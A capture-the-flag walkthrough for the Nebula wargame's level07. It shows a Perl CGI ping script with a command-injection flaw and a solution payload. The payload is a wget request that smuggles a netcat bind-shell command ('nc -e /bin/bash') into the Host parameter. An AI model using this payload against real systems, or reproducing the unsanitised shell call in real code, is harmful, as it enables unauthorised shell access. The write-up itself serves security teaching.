Nebula - level07 - Vulnerable HTTP Parameter Input

About

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");

}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Solution

The line @output = 'ping -c 3 $host 2>&1'; uses unsanitized user input to execute a command in a shell. To craft $host into a useful parameter, consider ping -c 3 $IP; nc.traditional -lkp 8080 -e /bin/bash;. With this in mind, create an HTTP GET request with Host as the parameter:
wget http://127.0.0.1:7007/index.cgi?HOST=\'127.0.0.1; nc.traditional -lkp 8080 -e "/bin/bash"; #\'
The port 7007 and the path to index.cgi come from /home/flag07/thttpd.conf. Use nc 127.0.0.1 8080 to connect to the shell.